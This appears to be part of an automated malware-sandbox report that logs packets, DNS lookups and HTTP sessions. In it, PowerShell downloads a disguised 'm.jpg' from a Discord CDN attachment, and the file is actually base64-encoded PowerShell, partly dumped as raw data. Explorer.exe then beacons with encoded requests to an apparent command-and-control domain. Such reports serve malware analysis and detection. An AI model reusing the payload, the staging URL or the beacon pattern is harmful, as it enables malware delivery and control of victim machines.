                                                      Dec 2, 2021 18:26:37.808129072 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808135033 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808161020 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808165073 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808204889 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808269024 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808391094 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808459044 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808521032 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808532953 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808542967 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808547974 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808578968 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808619976 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808631897 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808661938 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808700085 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808708906 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808716059 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808733940 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808744907 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808815002 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808900118 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808912039 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808923006 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808928013 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808954000 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808958054 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808967113 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809030056 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809055090 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809058905 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809077978 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809138060 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809146881 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809151888 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809159040 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809190035 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809211016 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809240103 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.843626022 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.883446932 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.883475065 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:28:23.687527895 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:23.934154034 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:23.934355974 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:23.934557915 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:24.180543900 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:24.193949938 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:24.194021940 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:24.194272995 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:24.194363117 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:24.440359116 CET804916747.241.96.113192.168.2.22

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 2, 2021 18:26:36.163012981 CET5216753192.168.2.228.8.8.8
                                                      Dec 2, 2021 18:26:36.190970898 CET53521678.8.8.8192.168.2.22
                                                      Dec 2, 2021 18:26:36.196990013 CET5059153192.168.2.228.8.8.8
                                                      Dec 2, 2021 18:26:36.224750042 CET53505918.8.8.8192.168.2.22
                                                      Dec 2, 2021 18:26:37.210226059 CET5780553192.168.2.228.8.8.8
                                                      Dec 2, 2021 18:26:37.232888937 CET53578058.8.8.8192.168.2.22
                                                      Dec 2, 2021 18:28:03.277404070 CET5903053192.168.2.228.8.8.8
                                                      Dec 2, 2021 18:28:03.306587934 CET53590308.8.8.8192.168.2.22
                                                      Dec 2, 2021 18:28:23.495855093 CET5918553192.168.2.228.8.8.8
                                                      Dec 2, 2021 18:28:23.679661036 CET53591858.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Dec 2, 2021 18:26:36.163012981 CET192.168.2.228.8.8.80x9e6Standard query (0)google.comA (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:36.196990013 CET192.168.2.228.8.8.80x782aStandard query (0)google.comA (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:37.210226059 CET192.168.2.228.8.8.80xbc48Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:28:03.277404070 CET192.168.2.228.8.8.80xfc43Standard query (0)www.foodcartgps.netA (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:28:23.495855093 CET192.168.2.228.8.8.80x9c63Standard query (0)www.milan-sites.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Dec 2, 2021 18:26:36.190970898 CET8.8.8.8192.168.2.220x9e6No error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:36.224750042 CET8.8.8.8192.168.2.220x782aNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:37.232888937 CET8.8.8.8192.168.2.220xbc48No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:37.232888937 CET8.8.8.8192.168.2.220xbc48No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:37.232888937 CET8.8.8.8192.168.2.220xbc48No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:37.232888937 CET8.8.8.8192.168.2.220xbc48No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:26:37.232888937 CET8.8.8.8192.168.2.220xbc48No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:28:03.306587934 CET8.8.8.8192.168.2.220xfc43Name error (3)www.foodcartgps.netnonenoneA (IP address)IN (0x0001)
                                                      Dec 2, 2021 18:28:23.679661036 CET8.8.8.8192.168.2.220x9c63No error (0)www.milan-sites.com47.241.96.113A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com
                                                      • www.milan-sites.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.2249165162.159.135.233443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.224916747.241.96.11380C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Dec 2, 2021 18:28:23.934557915 CET1951OUTGET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1
                                                      Host: www.milan-sites.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Dec 2, 2021 18:28:24.193949938 CET1951INHTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Thu, 02 Dec 2021 17:28:24 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: /
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.2249165162.159.135.233443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2021-12-02 17:26:37 UTC0OUTGET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                      2021-12-02 17:26:37 UTC0INHTTP/1.1 200 OK
                                                      Date: Thu, 02 Dec 2021 17:26:37 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1920730
                                                      Connection: close
                                                      CF-Ray: 6b7642e54c562b16-FRA
                                                      Accept-Ranges: bytes
                                                      Age: 34781
                                                      Cache-Control: public, max-age=31536000
                                                      ETag: "de726dd453796b237393f7e160eb25e2"
                                                      Expires: Fri, 02 Dec 2022 17:26:37 GMT
                                                      Last-Modified: Thu, 02 Dec 2021 02:59:05 GMT
                                                      CF-Cache-Status: HIT
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Cf-Bgj: h2pri
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      x-goog-generation: 1638413945526918
                                                      x-goog-hash: crc32c=ziGBiQ==
                                                      x-goog-hash: md5=3nJt1FN5ayNzk/fhYOsl4g==
                                                      x-goog-metageneration: 1
                                                      x-goog-storage-class: STANDARD
                                                      x-goog-stored-content-encoding: identity
                                                      x-goog-stored-content-length: 1920730
                                                      X-GUploader-UploadID: ADPycdtOSUidk_80tzHe3TlG8PYi8QYnojg95PvSsXIJW1mjMpAdWZBGuKmDVfVzmIG0crwn_112m2vXYrH1XJmsMs4
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AQJ%2BdaFGkk%2BJSHgGzsXo2NZR%2F%2FpxrHCydudUI3eCZni27nZGoVPe8YJjrHnXLzIWmJm%2FtyaEmdoddTPI%2F0ToFquJEMOg4pAodsVOJTbvjdFZoWHZdF9J7uzW0a6qjkAIEL8UBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      2021-12-02 17:26:37 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                      2021-12-02 17:26:37 UTC1INData Raw: 56 33 4a 70 64 47 55 74 56 6d 56 79 59 6d 39 7a 5a 53 41 69 52 32 56 30 4c 55 52 6c 59 32 39 74 63 48 4a 6c 63 33 4e 6c 5a 45 4a 35 64 47 56 42 63 6e 4a 68 65 53 49 37 4a 47 45 39 4a 47 45 39 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 6e 65 7a 49 33 4f 44 45 33 4e 6a 46 46 4c 54 49 34 52 54 41 74 4e 44 45 77 4f 53 30 35 4f 55 5a 46 4c 55 49 35 52 44 45 79 4e 30 4d 31 4e 30 46 47 52 58 30 6e 4f 31 64 79 61 58 52 6c 4c 56 5a 6c 63 6d 4a 76 63 32 55 67 49 6b 64 6c 64 43 31 45 5a 57 4e 76 62 58 42 79 5a 58 4e 7a 5a 57 52 43 65 58 52 6c 51 58 4a 79 59 58 6b 69 4f 79 52 68 50 53 52 68 50 56 64 79 61 58 52 6c 4c 55 68 76 63 33 51 67 4a 33 73 79 4e 7a 67 78 4e 7a 59 78 52 53 30 79 4f 45 55 77 4c 54 51 78 4d 44 6b 74 4f 54 6c 47 52 53 31 43 4f 55 51 78 4d 6a 64
                                                      Data Ascii: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjd
                                                      2021-12-02 17:26:37 UTC3INData Raw: 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71
                                                      Data Ascii: ioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
                                                      2021-12-02 17:26:37 UTC4INData Raw: 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b
                                                      Data Ascii: oqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqK
                                                      2021-12-02 17:26:37 UTC5INData Raw: 73 59 44 49 79 4c 47 42 43 52 53 78 67 52 6a 67 73 59 45 45 35 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 51 33 4c 47 42 47 4f 43 78 67 51 6a 55 73 59 44 64 47 4c 47 41 34 52 43 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 63 31 4c 47 42 46 4f 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 45 5a 45 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 46 42 4c 47 41 33 52 69 78 67 52 44 63 73 59 45 46 47 4c 47 41 79 4d 53 78 67 51 30 59 73 59 45 56 47 4c 47 42 42 4f 53 78 67 4d 30 59 73 59 44 4d 33 4c 47 41 7a 52 43 78 67 4e 30 59 73 59 44 45 77 4c 47 42 47 52 43 78 67 52 6b 59 73 59 44 4d 33 4c 47 42 47 4f 53 78 67 4e 55 51 73 59 45 5a 46 4c 47 41 35 52 53 78 67 52 45 59 73 59 45 55 30 4c 47 42 45 4e 79 78 67 52 6a
                                                      Data Ascii: sYDIyLGBCRSxgRjgsYEE5LGAzRixgRTksYEQ3LGBGOCxgQjUsYDdGLGA4RCxgNUYsYEUzLGBENyxgRjgsYDc1LGBFOCxgRkYsYEZGLGBGNyxgRkYsYEZELGA2QixgRkMsYDFBLGA3RixgRDcsYEFGLGAyMSxgQ0YsYEVGLGBBOSxgM0YsYDM3LGAzRCxgN0YsYDEwLGBGRCxgRkYsYDM3LGBGOSxgNUQsYEZFLGA5RSxgREYsYEU0LGBENyxgRj
                                                      2021-12-02 17:26:37 UTC7INData Raw: 4e 53 78 67 52 54 67 73 59 44 64 47 4c 47 41 32 4d 43 78 67 4e 44 63 73 59 45 4e 43 4c 47 42 44 52 69 78 67 52 55 59 73 59 44 51 35 4c 47 42 47 52 69 78 67 4d 55 49 73 59 45 51 33 4c 47 41 33 4f 53 78 67 4e 54 6b 73 59 44 55 78 4c 47 41 30 4d 79 78 67 51 7a 59 73 59 44 4d 31 4c 47 41 31 4e 53 78 67 4d 55 45 73 59 45 5a 44 4c 47 41 78 4e 79 78 67 51 6b 51 73 59 44 63 32 4c 47 41 30 52 69 78 67 4f 44 49 73 59 44 42 47 4c 47 42 46 4f 43 78 67 4e 54 6b 73 59 45 5a 45 4c 47 42 46 52 69 78 67 52 44 49 73 59 45 55 32 4c 47 42 45 51 69 78 67 51 6b 59 73 59 44 41 32 4c 47 41 31 52 53 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 33 52 69 78 67 4f 45 51 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4d 30 55 73 59 45 4a 47 4c 47 42 47 4e 69 78 67 51 55 59 73 59 45 59 78 4c 47 42
                                                      Data Ascii: NSxgRTgsYDdGLGA2MCxgNDcsYENCLGBDRixgRUYsYDQ5LGBGRixgMUIsYEQ3LGA3OSxgNTksYDUxLGA0MyxgQzYsYDM1LGA1NSxgMUEsYEZDLGAxNyxgQkQsYDc2LGA0RixgODIsYDBGLGBFOCxgNTksYEZELGBFRixgRDIsYEU2LGBEQixgQkYsYDA2LGA1RSxgRjksYDc1LGA3RixgOEQsYDZGLGBGRixgM0UsYEJGLGBGNixgQUYsYEYxLGB
                                                      2021-12-02 17:26:37 UTC8INData Raw: 45 49 31 4c 47 42 47 4f 53 78 67 4d 6a 4d 73 59 44 41 35 4c 47 41 31 52 53 78 67 4e 45 55 73 59 44 55 30 4c 47 41 35 4f 53 78 67 4e 54 41 73 59 44 64 47 4c 47 42 47 52 69 78 67 4d 6a 49 73 59 45 49 31 4c 47 42 47 52 69 78 67 4e 7a 63 73 59 45 55 35 4c 47 42 47 4e 79 78 67 4e 55 59 73 59 44 6c 43 4c 47 42 43 52 53 78 67 52 6b 49 73 59 44 5a 47 4c 47 42 46 4f 43 78 67 52 6a 4d 73 59 44 64 47 4c 47 41 35 4d 43 78 67 4e 6a 41 73 59 45 4a 45 4c 47 41 77 4d 53 78 67 4e 6b 51 73 59 45 55 34 4c 47 42 45 52 43 78 67 52 54 59 73 59 44 4d 33 4c 47 42 47 4f 43 78 67 4d 7a 55 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 6b 59 73 59 44 6c 45 4c 47 42 47 52 53 78 67 52 6b 59 73 59 44 67 32 4c 47 41 7a 52 53 78 67 52 6b 49 73 59 45 59 7a 4c 47 42 42 4f 43 78 67 51 30 51 73
                                                      Data Ascii: EI1LGBGOSxgMjMsYDA5LGA1RSxgNEUsYDU0LGA5OSxgNTAsYDdGLGBGRixgMjIsYEI1LGBGRixgNzcsYEU5LGBGNyxgNUYsYDlCLGBCRSxgRkIsYDZGLGBFOCxgRjMsYDdGLGA5MCxgNjAsYEJELGAwMSxgNkQsYEU4LGBERCxgRTYsYDM3LGBGOCxgMzUsYDdFLGA4RCxgRkYsYDlELGBGRSxgRkYsYDg2LGAzRSxgRkIsYEYzLGBBOCxgQ0Qs
                                                      2021-12-02 17:26:37 UTC9INData Raw: 78 67 4e 54 59 73 59 44 56 43 4c 47 41 7a 52 69 78 67 4f 45 55 73 59 45 52 47 4c 47 41 7a 52 69 78 67 4d 6a 4d 73 59 44 55 34 4c 47 41 34 52 69 78 67 4e 30 59 73 59 45 56 42 4c 47 41 7a 4e 79 78 67 52 6b 59 73 59 44 4a 44 4c 47 41 7a 51 69 78 67 52 6a 67 73 59 45 49 31 4c 47 42 45 4d 43 78 67 52 54 55 73 59 44 6c 47 4c 47 42 47 4d 69 78 67 52 44 63 73 59 45 5a 47 4c 47 42 45 4e 43 78 67 51 6b 59 73 59 44 6c 46 4c 47 42 47 52 53 78 67 51 6a 55 73 59 44 64 47 4c 47 42 44 4e 43 78 67 4f 55 59 73 59 45 59 32 4c 47 41 30 4e 79 78 67 52 6a 6b 73 59 44 56 45 4c 47 42 47 52 53 78 67 4e 54 59 73 59 45 4a 47 4c 47 41 30 4d 53 78 67 52 6b 45 73 59 45 56 43 4c 47 42 47 51 79 78 67 4e 55 55 73 59 45 5a 47 4c 47 42 47 4f 43 78 67 52 55 59 73 59 45 59 77 4c 47 42 47 51
                                                      Data Ascii: xgNTYsYDVCLGAzRixgOEUsYERGLGAzRixgMjMsYDU4LGA4RixgN0YsYEVBLGAzNyxgRkYsYDJDLGAzQixgRjgsYEI1LGBEMCxgRTUsYDlGLGBGMixgRDcsYEZGLGBENCxgQkYsYDlFLGBGRSxgQjUsYDdGLGBDNCxgOUYsYEY2LGA0NyxgRjksYDVELGBGRSxgNTYsYEJGLGA0MSxgRkEsYEVCLGBGQyxgNUUsYEZGLGBGOCxgRUYsYEYwLGBGQ
                                                      2021-12-02 17:26:37 UTC11INData Raw: 47 4c 47 42 46 51 79 78 67 52 6b 55 73 59 44 4d 32 4c 47 42 43 52 69 78 67 52 54 55 73 59 45 46 47 4c 47 41 30 4e 79 78 67 52 55 59 73 59 45 56 44 4c 47 42 47 52 53 78 67 4e 54 51 73 59 45 5a 45 4c 47 41 30 52 69 78 67 4e 7a 63 73 59 45 52 46 4c 47 42 47 4f 53 78 67 4d 54 4d 73 59 45 59 77 4c 47 42 44 52 53 78 67 52 6b 59 73 59 45 59 79 4c 47 42 47 51 53 78 67 4d 55 59 73 59 45 59 34 4c 47 42 46 4e 79 78 67 52 44 4d 73 59 44 64 47 4c 47 42 47 52 43 78 67 52 44 63 73 59 45 59 35 4c 47 42 47 51 69 78 67 52 6b 59 73 59 44 63 79 4c 47 42 47 52 69 78 67 4f 55 51 73 59 45 56 45 4c 47 42 45 52 69 78 67 4d 6a 41 73 59 45 5a 45 4c 47 41 31 4e 53 78 67 51 30 49 73 59 45 51 35 4c 47 41 32 52 69 78 67 51 30 55 73 59 45 5a 44 4c 47 42 43 4d 53 78 67 52 6b 51 73 59 44
                                                      Data Ascii: GLGBFQyxgRkUsYDM2LGBCRixgRTUsYEFGLGA0NyxgRUYsYEVDLGBGRSxgNTQsYEZELGA0RixgNzcsYERFLGBGOSxgMTMsYEYwLGBDRSxgRkYsYEYyLGBGQSxgMUYsYEY4LGBFNyxgRDMsYDdGLGBGRCxgRDcsYEY5LGBGQixgRkYsYDcyLGBGRixgOUQsYEVELGBERixgMjAsYEZELGA1NSxgQ0IsYEQ5LGA2RixgQ0UsYEZDLGBCMSxgRkQsYD
                                                      2021-12-02 17:26:37 UTC12INData Raw: 4e 55 55 73 59 44 4e 43 4c 47 42 47 4f 53 78 67 51 54 6b 73 59 45 52 47 4c 47 42 47 51 79 78 67 4d 6a 6b 73 59 44 68 45 4c 47 41 78 52 69 78 67 51 6a 41 73 59 45 5a 47 4c 47 42 42 51 53 78 67 4e 30 59 73 59 45 59 77 4c 47 42 45 4f 53 78 67 52 6a 4d 73 59 45 59 30 4c 47 42 47 4d 79 78 67 4d 30 59 73 59 45 56 43 4c 47 41 35 52 69 78 67 4d 45 4d 73 59 45 45 32 4c 47 41 32 4e 79 78 67 52 54 63 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4e 7a 55 73 59 44 64 47 4c 47 42 45 51 69 78 67 52 45 59 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6b 4d 73 59 44 63 31 4c 47 42 42 4f 53 78 67 52 54 55 73 59 45 4e 46 4c 47 41 30 52 69 78 67 52 44 55 73 59 44 64 47 4c 47 41 32 4d 53 78 67 51 54 63 73 59 44 67 7a 4c 47 42 47 52 69 78 67 52 55 55 73 59 44 64 47 4c 47 42 42 4e 79 78
                                                      Data Ascii: NUUsYDNCLGBGOSxgQTksYERGLGBGQyxgMjksYDhELGAxRixgQjAsYEZGLGBBQSxgN0YsYEYwLGBEOSxgRjMsYEY0LGBGMyxgM0YsYEVCLGA5RixgMEMsYEE2LGA2NyxgRTcsYDM3LGBGRixgNzUsYDdGLGBEQixgREYsYEZCLGBCNyxgRkMsYDc1LGBBOSxgRTUsYENFLGA0RixgRDUsYDdGLGA2MSxgQTcsYDgzLGBGRixgRUUsYDdGLGBBNyx
                                                      2021-12-02 17:26:37 UTC13INData Raw: 47 41 32 52 53 78 67 52 55 49 73 59 45 4a 47 4c 47 42 47 52 53 78 67 52 6a 45 73 59 44 5a 47 4c 47 41 35 4d 43 78 67 52 6b 55 73 59 44 5a 45 4c 47 42 43 52 69 78 67 51 30 59 73 59 44 64 47 4c 47 41 35 4e 53 78 67 4d 7a 4d 73 59 45 51 33 4c 47 41 33 52 53 78 67 52 6b 4d 73 59 44 55 7a 4c 47 42 47 4e 53 78 67 52 55 59 73 59 45 52 46 4c 47 41 33 4f 53 78 67 52 6a 45 73 59 44 4a 47 4c 47 42 47 51 79 78 67 4e 54 55 73 59 45 51 77 4c 47 41 31 4d 43 78 67 52 6b 59 73 59 45 59 7a 4c 47 41 7a 52 69 78 67 51 6a 51 73 59 44 64 43 4c 47 42 45 4e 79 78 67 52 54 4d 73 59 45 45 78 4c 47 41 7a 52 69 78 67 4d 44 59 73 59 45 51 77 4c 47 41 34 51 53 78 67 4e 55 59 73 59 45 59 77 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 46 45 4c 47 42 46 4f 53 78 67 4d 55 59 73 59 45 5a 42
                                                      Data Ascii: GA2RSxgRUIsYEJGLGBGRSxgRjEsYDZGLGA5MCxgRkUsYDZELGBCRixgQ0YsYDdGLGA5NSxgMzMsYEQ3LGA3RSxgRkMsYDUzLGBGNSxgRUYsYERFLGA3OSxgRjEsYDJGLGBGQyxgNTUsYEQwLGA1MCxgRkYsYEYzLGAzRixgQjQsYDdCLGBENyxgRTMsYEExLGAzRixgMDYsYEQwLGA4QSxgNUYsYEYwLGA5QixgRkUsYEFELGBFOSxgMUYsYEZB
